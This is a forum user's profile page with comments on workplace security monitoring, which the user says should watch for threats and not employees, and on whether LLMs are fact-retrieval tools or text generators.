He / They

  • 1 Post
  • 281 Comments
Joined 1 year ago
cake
Cake day: June 16th, 2023

help-circle
  • Speaking as an infosec professional, security monitoring software should be targeted at threats, not at the user. We want to know the state of the laptop as it relates to the safety of the data on that machine. We don’t, and in healthy workplaces can’t, determine what an employee is doing that does not behaviorally conform to a threat.

    Yes, if a user repeatedly gets virus detections around 9pm, we can infer what’s going on, but we aren’t tracking their websites visited, because the AUP is structured around impacts/outcomes, not actions alone.

    As an example, we don’t care if you run a python exploit, we care if you run it against a machine you do not have authorization to (i.e. violating CFAA). So we don’t scan your files against exploitdb, we watch for unusual network traffic that conforms to known exploits, and capture that request information.

    So if you try to pentest pornhub, we’ll know. But if you just visit it in Firefox, we won’t.

    We’re not prison guards, like these schools apparently think they are, we’re town guards.






  • the purpose of my car is to get me from place to place

    No, that was the purpose for you, that made you choose to buy it. Someone else could have chosen to buy a car to live in it, for example. The purpose of a tool is just to be a tool. A hammer’s purpose isn’t just to hit nails with, it’s to be a heavy thing you can use as-needed. You could hit a person with it, or straighten out dents in a metal sheet, or destroy a harddrive. I think you’re conflating the intended use of something, with its purpose for existing, and it’s leading you to assert that the purpose of LLMs is one specific use only.

    An LLM is never going to be a fact-retrieval engine, but it has plenty of legitimate uses: generating creative text is very useful. Just because OpenAI is selling their creative-text engine under false pretenses doesn’t invalidate the technology itself.

    I think we can all agree that it did a thing they didn’t want it to do, and that an LLM by itself may not be the correct tool for the job.

    Sure, 100% they are using/ selling the wrong tool for the job, but the tool is not malfunctioning.




  • Except Lvxferre is actually correct; LLMs are not capable of determining what is useful or not useful, nor can they ever be as a fundamental part of their models; they are simply strings of weighted tokens/numbers. The LLM does not “know” anything, it is approximating text similar to what it was trained on.

    It would be like training a parrot and then being upset that it doesn’t understand what the words mean when you ask it questions and it just gives you back words it was trained on.

    The only way to ensure they produce only useful output is to screen their answers against a known-good database of information, at which point you don’t need the AI model anyways.

    A software bug is not about what was intended at a design level, it’s about what was intended at the developer level. If the program doesn’t do what the developer intended when they wrote the code, that’s a bug. If the developer coded the program to do something different than the manager requested, that’s not a bug in the software, that’s a management issue.

    Right now LLMs are doing exactly what they’re being coded to do. The disconnect is the companies selling them to customers as something other than what they are coding them to do. And they’re doing it because the company heads don’t want to admit what their actual limitations are.